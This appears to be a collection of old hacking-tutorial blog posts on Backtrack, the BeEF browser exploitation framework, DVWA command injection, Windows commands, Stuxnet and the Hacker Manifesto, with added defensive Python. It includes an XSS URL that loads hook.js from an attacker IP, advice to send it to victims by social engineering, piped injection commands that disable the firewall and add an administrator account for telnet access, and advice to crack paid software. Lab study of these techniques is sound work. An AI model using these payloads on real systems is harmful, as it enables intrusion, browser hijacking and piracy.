
 

Monday, October 1

Installing Nessus on Backtrack 5R3

Hello Friends,

Today I am showing how to install Nessus on Backtrack 5 R3.

First go to the Nessus website and register by clicking here.

The activation code will be sent to your e-mail ID. Now take the activation code.

Open a new terminal in Backtrack 5 R3 and type the following command to download Nessus:

apt-get install nessus

After the download completes, type this command:

root@bt:~# /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

It will take some time while the plugins are updated.

Now add a user to Nessus by using this command:

root@bt:~# /opt/nessus/sbin/nessus-adduser

It will ask for a username and password. After entering them, start Nessus by typing the following command:

root@bt:~# /etc/init.d/nessusd start

This starts Nessus. Now open the browser and type the following address in the URL bar:

https://localhost:8834/

Nessus runs over the secure channel HTTPS, and by default on port number 8834.

after installing you just have to run


Thank you.





Sunday, September 23

How to Run "C Program" in Linux

Hello friends,

Sometimes we need to run C programs on a Linux box.

Today I am showing you how to run a C language program on a Linux system.

In Linux we can use the gcc command to compile C programs.

Most of the time gcc is installed by default in Linux.

Type the following command to verify that gcc is installed:

which gcc

output

/usr/bin/gcc

To find the version of gcc:

gcc --version

output

gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Writing the first program:

Open the vi editor

$ vi Hello.c

and type the following lines of code

#include <stdio.h>

/* Entry point: print a greeting and report success to the shell. */
int main(void)
{
    printf("Hello World\n");
    return 0;
}

Compiling the program

Compile the program into an executable

$ gcc Hello.c -o Hello

To execute the program

$ ./Hello

Output

Hello World




Tuesday, September 4

BeEF Lab

Hello friends,

We saw how to start and test BeEF in the previous post. In this post we will see how to work with an XSS vulnerability by using the BeEF framework.

Lab Setting:

1. XP Virtual Machine (Victim)
2. Backtrack VM (Attacker)

Attacker:

1. Start BeEF in Backtrack.

Now we will get the UI URL and the hook URL.

2. Open the browser (any browser, but Firefox is preferable).

3. Copy the UI URL from the terminal and paste it into the URL bar of the browser: http://192.168.0.103:3000/ui/panel

4. Now you will get the login screen of BeEF.

5. Enter the username and password as beef/beef.

6. Take any site that is vulnerable to XSS, e.g. demo.testfire.net

7. Check for the cross-site scripting vulnerability with a simple script: <script>alert(123);</script>

8. Paste that script in the search box of demo.testfire.net

9. See whether you get the pop-up box or not.

10. Look at the URL of the website: http://demo.testfire.net/search.aspx?txtSearch=<script>alert(123);</script>

11. Frame the URL like this, with <script src=http://192.168.0.103:3000/hook.js></script> as the search text:

http://demo.testfire.net/search.aspx?txtSearch=<script src=http://192.168.0.103:3000/hook.js></script>

12. Perform some social engineering to send the link to the victim by mail or chat.

Victim:

1. The victim opens the link the attacker sent. Nothing appears changed; the page looks as usual.

Attacker:

Whenever the victim opens that link, check the BeEF user interface.

BeEF will create a zombie for the victim system.

Click on the zombie that was created.

Go to the Commands tab --> Misc --> Raw javascript --> Execute

and look at the victim machine, i.e. the XP machine.

Now you can execute whatever commands you want on the victim machine.

In the next post I will show how to integrate Metasploit with the BeEF framework.

Thank you.
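
Added example (not part of the original post): the lab works because search.aspx writes the txtSearch value back into the page unencoded. The Python sketch below shows that pattern beside an HTML-encoded version, and a check a site owner could run over requested URLs to spot script tags, including ones that load from another host as in step 11. The function names and the response header constant are illustrative assumptions; the sample URLs are built from the ones in the post.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Opening <script ...> tag and its src attribute (quoted or unquoted).
SCRIPT_TAG = re.compile(r"<\s*script\b([^>]*)>", re.I)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

# Second layer: even if encoding is missed somewhere, the browser will
# refuse scripts that are inline or served from another origin.
RESPONSE_HEADERS = {"Content-Security-Policy": "script-src 'self'"}


def render_results_vulnerable(term):
    """Reflects the search term as-is: markup in the term becomes page markup."""
    return "<p>Results for: " + term + "</p>"


def render_results_encoded(term):
    """Reflects the search term as text: <, >, &, quotes become entities."""
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


def find_script_injection(url):
    """Return (parameter, kind, host) for every script tag found in the query.

    kind is 'inline-script', 'same-site-script' or 'external-script';
    host is the host the tag loads from (None for inline scripts).
    """
    parts = urlsplit(url)
    site_host = parts.hostname or ""
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are seen too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for tag in SCRIPT_TAG.finditer(value):
            src = SRC_ATTR.search(tag.group(1))
            if src is None:
                findings.append((name, "inline-script", None))
                continue
            src_host = urlsplit(src.group(1)).netloc
            if src_host and src_host.split(":")[0] != site_host:
                findings.append((name, "external-script", src_host))
            else:
                findings.append((name, "same-site-script", src_host or site_host))
    return findings


# Sample requests, constructed from the URLs shown in the post.
BASE = "http://demo.testfire.net/search.aspx?txtSearch="
ALERT_URL = BASE + "<script>alert(123);</script>"
HOOK_URL = BASE + "<script src=http://192.168.0.103:3000/hook.js></script>"
HOOK_URL_ENCODED = (BASE + "%3Cscript%20src%3Dhttp%3A%2F%2F192.168.0.103"
                    "%3A3000%2Fhook.js%3E%3C%2Fscript%3E")
BENIGN_URL = BASE + "savings"

if __name__ == "__main__":
    for url in (BENIGN_URL, ALERT_URL, HOOK_URL, HOOK_URL_ENCODED):
        print(find_script_injection(url))
    payload = "<script src=http://192.168.0.103:3000/hook.js></script>"
    print(render_results_vulnerable(payload))
    print(render_results_encoded(payload))
```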


Monday, September 3

BeEF - Browser Exploitation Framework

BeEF is the Browser Exploitation Framework. It is a powerful security framework that mainly focuses on browser-based exploits.

If you want to see real exploitation with XSS (Cross-Site Scripting), BeEF is a good choice. By using BeEF we can see what can be done with an XSS vulnerability.

How to start with BeEF

BeEF already ships with Backtrack, but you have to install it once before first use:

Applications --> Backtrack --> Exploitation Tools --> Social Engineering Tools --> Beef XSS Framework --> Beef installer

You will be getting this screen.

Then start BeEF:

Applications --> Backtrack --> Exploitation Tools --> Social Engineering Tools --> Beef XSS Framework --> Beef

Don't close this terminal; leave it running.

The default username/password is beef/beef.

Copy the UI URL and paste it into the attacker's browser, and we will get the BeEF authentication page.

After login we will get this page.

For checking, open

http://192.168.0.107:3000/demos/basic.html

in another tab and look at the hooked browser section.

After that we will get all the details of the hooked browser and we can execute scripts.

In the next article we will see how to exploit an XSS vulnerability using the BeEF framework.

More information on BeEF

http://www.bindshell.net/tools/beef.html

http://beefproject.com/



Friday, July 20

Acunetix

Hello friends, today we are looking at the popular web application scanner called Acunetix.

Acunetix is one of the best web application scanners.

There are a lot of other scanners, like:

IBM AppScan

Acunetix

HP WebInspect

Netsparker

W3af

Of these, only w3af is an open-source web application scanner; it is freely available with Backtrack 5.

Coming to Acunetix, here I am showing Acunetix version 7 and how to install and use it.

go and search the google for the Acunetix version 7 and crack

after that install the Acunetix and crack

Now we will start scanning a website and search for vulnerabilities.

First go to New Scan ->

You will be getting this screen.

Here you have to enter the scan type.

There are different scan types:

1. Scan a single URL

2. Use the crawled results for scanning

3. Scan more than one URL; in that case we have to put the URLs in a file and provide it as input

Now we are scanning a single URL.

I am taking the URL http://www.testasp.vulnweb.com

Just click on Next and we can check whether our website is running or not.

We will get the banner of the server, such as the server operating system, the web server, the language used to develop the website, etc.

Then the scanner asks for the crawling options. Look at each and every option and check the boxes.

When we click on Next, the scan options appear.

There are three types of scan options:

1. Quick

2. Heuristic

3. Extensive

The Quick scan won't give very accurate results.

The Extensive scan will take a lot of time.

So we will go for the Heuristic scan.

Then it will show the final screen and we will go for scanning.

Then scanning starts.

Then Happy Scanning

In my next post I will show how to test for vulnerabilities using Acunetix.

Good Bye

Saturday, May 19

Command Execution Vulnerability Exploitation

Today I will be showing how to hack a website with the command execution vulnerability.

We will see this on DVWA.

What is Command Execution?

OS command injection is a technique used via a web interface in order to execute OS commands on a web server.

The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.

*** In the previous article I wrote about how to access the DVWA that is installed on the XP machine from Backtrack.

Practical:

1. Take the XP machine and the Backtrack machine.

2. Enter the IP of the XP machine followed by dvwa:

http://192.168.25.54/dvwa

DVWA will open; go to Command Execution.

3. The DVWA page asks for an IP to ping,

so enter 127.0.0.1 (your IP).

It pings, so that's cool.

4. Now try to execute the dir command.

Boom...

Got an error. What's the problem?

It only allows you to execute the ping command, not any other. So

how do we bypass this?

We can bypass this by using the && or | (pipe) symbol.

5. Now let's try this command:

127.0.0.1 && dir  (or)

127.0.0.1 | dir   (or)

 | dir

meaning just the pipe and the command.

OK, it executed. Now try to find the IP of the remote system:

127.0.0.1 | ipconfig

Now if you want to list the files in the system32 directory:

127.0.0.1 && cd ../../../../../windows/system32 & dir

Now you can access whatever files you require from the system.
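
Added example (not part of the original post, and not DVWA's own code): the && and | inputs above work when the form value is appended to "ping " and the resulting string is handed to a shell. The Python sketch below puts that pattern beside a hardened handler that accepts only a literal IPv4 address and runs ping from an argument list with no shell. All function names are illustrative assumptions, and the sample inputs are the ones typed in the post.

```python
import ipaddress
import subprocess
import sys

# Characters cmd.exe and POSIX shells treat as separators or redirection.
SHELL_METACHARS = "&|;<>`$\r\n"


def build_ping_vulnerable(target):
    """The flawed pattern: form input concatenated into one shell string."""
    return "ping " + target  # a shell parses '&&' and '|' inside target


def parse_ping_target(target):
    """Return target as a canonical IPv4 address or raise ValueError."""
    candidate = target.strip()
    found = sorted({c for c in candidate if c in SHELL_METACHARS})
    if found:
        # Worth logging: a ping form never needs these characters.
        raise ValueError("shell metacharacters in ping target: %r" % found)
    # Allow-list by type: only a dotted-quad IPv4 literal gets through.
    return str(ipaddress.IPv4Address(candidate))


def build_ping_argv(target):
    """Argument list for one echo request; the address is a single argv item."""
    address = parse_ping_target(target)
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "1", address]


def run_ping(target):
    """Run ping without a shell, so no operator in the input is interpreted."""
    completed = subprocess.run(build_ping_argv(target), shell=False,
                               capture_output=True, text=True, timeout=10)
    return completed.stdout


def check_inputs(inputs):
    """Map each input to ('ok', argv) or ('rejected', reason); runs nothing."""
    results = {}
    for raw in inputs:
        try:
            results[raw] = ("ok", build_ping_argv(raw))
        except ValueError as exc:
            results[raw] = ("rejected", str(exc))
    return results


# Inputs typed into the form in the post, plus the bare 'dir' from step 4.
POST_INPUTS = [
    "127.0.0.1",
    "dir",
    "127.0.0.1 && dir",
    "127.0.0.1 | dir",
    " | dir",
    "127.0.0.1 && cd ../../../../../windows/system32 & dir",
]

if __name__ == "__main__":
    for raw, (status, detail) in check_inputs(POST_INPUTS).items():
        print("%-55r %-9s %s" % (raw, status, detail))
    print(build_ping_vulnerable("127.0.0.1 && dir"))
```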

What else can we do with Command Execution?

Normally I execute the command like this:

| dir

But after this I want to take a shell on the remote computer. There are different ways; I am showing one.

1. I disabled the firewall by executing Windows commands.

To disable the Windows XP firewall:

    netsh firewall set opmode disable

In the command execution field type "| netsh firewall set opmode disable" (without quotes).

To enable the Windows XP firewall:

    netsh firewall set opmode enable

2. After that I wanted to start a service that is helpful to me, so I started the TELNET service by using the following commands.

To start the TELNET service from the command prompt:

    sc config tlntsvr start= auto (Hit Enter)

    net start telnet

In the command execution field type "| sc config tlntsvr start= auto" (without quotes), then

    | net start telnet

3. I want to access the remote PC with the help of Telnet, but it will ask for a login and password,

so I added a user from the command prompt.

To add a new user from the command prompt:

    net user /add user1 Ab12345

In the command execution field type "| net user /add user1 Ab12345" (without quotes).

4. Now I am a user but do not have privileges to access Telnet, so I added this user to the Administrators group for admin privileges:

    net localgroup administrators user1 /add

In the command execution field type "| net localgroup administrators user1 /add" (without quotes).

5. I started a terminal in Backtrack and connected with telnet:

    telnet 192.168.x.x

    login:user1
    password:Ab12345

Boooooooooooooooom...............

Got the shell of the remote computer

    c:\>
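
Added example (not part of the original post): every step above leaves a process-creation record on the XP host in which the web server spawns a shell carrying netsh, sc or net. The Python sketch below runs detection rules for exactly those commands over process-creation events. The event fields, the parent process names (httpd.exe for XAMPP's Apache, plus PHP binaries) and the timestamps are assumptions, and the sample events are constructed.

```python
import re

# Assumption: image names under which Apache/PHP run on the XAMPP host.
WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "php.exe"}

# One rule per command used in the post.
RULES = [
    ("firewall_disabled", re.compile(
        r"\bnetsh(?:\.exe)?\s+firewall\s+set\s+opmode\s+disable\b", re.I)),
    ("telnet_autostart", re.compile(
        r"\bsc(?:\.exe)?\s+config\s+tlntsvr\s+start=\s*auto\b", re.I)),
    ("remote_service_started", re.compile(
        r"\bnet1?(?:\.exe)?\s+start\s+(?:telnet|tlntsvr)\b", re.I)),
    ("user_added", re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+(?:.*\s)?/add\b", re.I)),
    ("admin_group_add", re.compile(
        r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]

# The combination that ends in a remote administrator login.
TAKEOVER_CHAIN = {"firewall_disabled", "remote_service_started",
                  "user_added", "admin_group_add"}


def match_rules(cmdline):
    """Names of all rules whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def detect(events):
    """Return (time, rule) for rule hits in processes spawned by the web server."""
    alerts = []
    for event in events:
        if event["parent"].lower() not in WEB_PARENTS:
            continue  # an administrator at the console is out of scope here
        for name in match_rules(event["cmdline"]):
            alerts.append((event["time"], name))
    return alerts


def is_takeover_chain(alerts):
    """True when every step of the chain was seen among the alerts."""
    return TAKEOVER_CHAIN <= {name for _, name in alerts}


# Constructed process-creation events: the shell started by the web server
# carries the injected text after 'ping'.
SAMPLE_EVENTS = [
    {"time": "10:01:02", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping 127.0.0.1"'},
    {"time": "10:03:10", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping | netsh firewall set opmode disable"'},
    {"time": "10:03:40", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping | sc config tlntsvr start= auto"'},
    {"time": "10:03:55", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping | net start telnet"'},
    {"time": "10:04:20", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping | net user /add user1 Ab12345"'},
    {"time": "10:04:41", "parent": "httpd.exe",
     "cmdline": 'cmd.exe /c "ping | net localgroup administrators user1 /add"'},
    {"time": "10:09:00", "parent": "explorer.exe",
     "cmdline": "net start telnet"},
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for when, rule in found:
        print(when, rule)
    print("takeover chain:", is_takeover_chain(found))
```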




Access DVWA from Backtrack

Hi,

Today I will show you how to access the DVWA (Damn Vulnerable Web Application) that is installed on the XP machine from Backtrack.

1. First we require the XP machine and the Backtrack machine in the same network. That means

if the XP machine IP is 192.168.0.22,

then Backtrack should also be in the same network, like 192.168.0.56.

2. Install XAMPP on the XP machine and start the Apache and MySQL services.

3. Download the DVWA (Damn Vulnerable Web Application) from http://sourceforge.net/projects/dvwa/ and place it in c:/xampp/htdocs/

4. Now go to the dvwa folder and open the .htaccess file with Notepad.

5. Move to the end of the file, place a hash (#) before "Deny from all",

and write "Allow from all" on the next line.

6. Now go to Backtrack and in the browser type the IP of the XP machine:

http://192.168.0.22/dvwa

7. Now you can access DVWA remotely.



Thank You.



Thursday, April 26

Installing Google Chrome in Backtrack 5

Friends,

Many people ask how to install the Google Chrome browser in Backtrack 5. Today we will see how to install it.

Let us see the steps.

1. As root, type:

apt-get install chromium-browser

2. Change to the chromium-browser directory:

cd /usr/lib/chromium-browser

3. Type the following command:

hexedit chromium-browser

4. You will get the hex code of the binary.

Here you have to search for geteuid and replace it with getppid. Chromium checks geteuid() at startup and refuses to run as root, which is the default user in Backtrack; after the edit that check calls getppid instead, so the browser starts while running as root.

Press TAB and search (CTRL+S) for geteuid, change it to getppid, and press CTRL+X.

It will ask whether to save; press 'Y' and close the terminal.

Then go to Applications --> Internet --> Chromium Browser

and check whether the browser is installed properly, and enjoy Backtrack.


Sunday, April 15

Stuxnet

Stuxnet --

Stuxnet is a computer worm discovered in June 2010 that initially spread via Windows machines and targeted Siemens systems. It is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit.

The worm spreads very fast, and it mainly targets Siemens SCADA (supervisory control and data acquisition) systems that are configured to control and monitor specific industrial processes. It mainly infects the PLCs in the SCADA systems.

When security experts tried to trace the sources of Stuxnet, they found that some sources were in Belarus and that the worm had spread mostly in Iran, i.e. more than 60%. It mainly infected Iran's nuclear program, which uses embargoed Siemens equipment procured secretly and has been damaged by Stuxnet.

The affected countries

Iran - 58.8%
India - 8%
USA - 1%

The worm itself now appears to have included two major components. One was designed to send Iran’s nuclear centrifuges spinning wildly out of control. Another seems right out of the movies: The computer program also secretly recorded what normal operations at the nuclear plant looked like, then played those readings back to plant operators, like a pre-recorded security tape in a bank heist, so that it would appear that everything was operating normally while the centrifuges were actually tearing themselves apart.

About two years ago, centrifuges at Iran’s uranium enrichment facility at Natanz started failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts said it was the handiwork of the Stuxnet code, and that it destroyed more than 1,000 centrifuges. Many believe the U.S., in conjunction with Israel, sabotaged the system.

Ralph Langner, a well-respected expert on industrial systems security, published an analysis of the worm, which targets Siemens software systems, and suggested that it may have been used to sabotage Iran's Bushehr nuclear reactor. A Siemens expert, Langner simulated a Siemens industrial network and then analyzed the worm's attack.

See Stuxnet: a Good Idea

On 1 September 2011 security experts found a virus related to the Stuxnet family, and they call it 'DUQU'. It is designed to capture information like keystrokes and system information.



























Saturday, March 17

Basic Commands for Windows

Hello Friends,

For your reference I am placing some basic Windows commands here.

compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 - System Information
sysedit - System Edit
win.ini - Windows loading information (also system.ini)
winver - Shows current version of Windows
mailto: - Opens default email client
command - Opens command prompt


Run commands to access the Control Panel:

Add/Remove Programs - control appwiz.cpl
Date/Time Properties - control timedate.cpl
Display Properties - control desk.cpl
FindFast - control findfast.cpl
Fonts Folder - control fonts
Internet Properties - control inetcpl.cpl
Keyboard Properties - control main.cpl keyboard
Mouse Properties - control main.cpl
Multimedia Properties - control mmsys.cpl
Network Properties - control netcpl.cpl
Password Properties - control password.cpl
Printers Folder - control printers
Sound Properties - control mmsys.cpl sounds


A
------------------------------------------------------
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

B
------------------------------------------------------
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

C
------------------------------------------------------
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data

D
------------------------------------------------------
DATE Display or set the date
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
DSRM Remove items from Active Directory

E
------------------------------------------------------
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the current script/routine and set an errorlevel
EXPAND Uncompress files
EXTRACT Uncompress CAB files

F
------------------------------------------------------
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

G
------------------------------------------------------
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

H
------------------------------------------------------
HELP Online Help

I
------------------------------------------------------
iCACLS Change file and folder permissions
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

K
------------------------------------------------------
KILL Remove a program from memory

L
------------------------------------------------------
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGOFF Log a user off
LOGTIME Log the date and time in a file

M
------------------------------------------------------
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

N
------------------------------------------------------
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

P
------------------------------------------------------
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

Q
------------------------------------------------------
QGREP Search file(s) for lines that match a given pattern

R
------------------------------------------------------
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files
REPLACE Replace or update one file with another
RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

S
------------------------------------------------------
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

T
------------------------------------------------------
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

U
------------------------------------------------------
USRSTAT List domain usernames and last login

V
------------------------------------------------------
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

W
------------------------------------------------------
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

X
------------------------------------------------------
XCACLS Change file and folder permissions
XCOPY Copy files and folders

What is Hacking

The word "hacking" has two definitions. The first definition refers to the hobby/profession of working with computers. The second definition refers to breaking into computer systems. While the first definition is older and is still used by many computer enthusiasts (who refer to cyber-criminals as "crackers"), the second definition is much more commonly used. In particular, the web pages here refer to "hackers" simply because our web-server logs show that everyone who reaches these pages is using the second definition as part of their search criteria.

Today the culture is such that a hacker is automatically thought of as a criminal who has committed some crime using computers, while that is not the case. Hacking generally refers to one who enjoys programming and finding security problems in systems. Hackers fall into different categories based upon their deeds:

1. WHITE HAT HACKERS

White Hat is a general term used in the computer/hacking arena to describe a security expert in penetration testing and programming. White Hats gain permission from the administrator or owner before trying to hack their website/program. They are a very well reputed group and are the most trusted ones. They generally work for computer security companies and do no illegal work. According to history, most White Hats have earlier been Black Hats [discussed below]. The only problem with being a White Hat is that you will have much less freedom, and the enjoyment in hacking would be lost.

2. BLACK HAT HACKERS

Black Hat is your bad guy. He is the guy who acts maliciously with his skills. These guys hack into computers without prior permission with the intention of earning something from it or just damaging it. They are proficient in using their skills for network hacking and creating computer viruses. Although he is your typical bad guy, he is the most knowledgeable one. Due to his freedom of mind he is experimental and does not hesitate to test his skills or viruses on other people's systems. Sometimes even the FBI calls for Black Hats' help when they need to hack a very secure network. But most Black Hats often land in prison. Due to their bad image they are often hated by society and sent to prison if found.

3. GRAY HAT HACKERS

These are the guys in between White and Black Hats. Their categorization depends on a variety of spectra, and they often get mingled with Black Hats. This type of guy discovers a vulnerability and informs both the hacker community and its owner. A Gray Hat may hack into a system unauthorized, but they do not cause any damage. Instead, they sell the vulnerability to the owner or just inform them. Gray Hats are the most disputed ones for their work, as they are sometimes categorized with White Hats and sometimes with Black Hats. Read the proper use of term Gray Hat Here

Now that you know the difference between the different types of hackers, you might have started to think about what type of hacker you would become. I say, DON'T THINK NOW. You can't decide what type of hacker you would ultimately be known as. It will be based on a variety of speculations and your deeds over time.

Now before ending this chapter, I have to describe The Hacker Manifesto. The Hacker Manifesto is a small essay written on January 8, 1986 by a very popular hacker who was known as THE MENTOR. It was written soon after he was arrested, and the essay was first published in Phrack. It is one of the most famous hacker anthems, and you must know about it before you proceed.
-----------------------------------------------------------------------------------------------------------------------------

Quote:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

\/\The Conscience of a Hacker/\/
by
+++The Mentor+++
Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's techno brain,
ever take a look behind the eyes of the hacker? Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain
for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals. We explore... and you call us criminals. We seek
after knowledge... and you call us criminals. We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

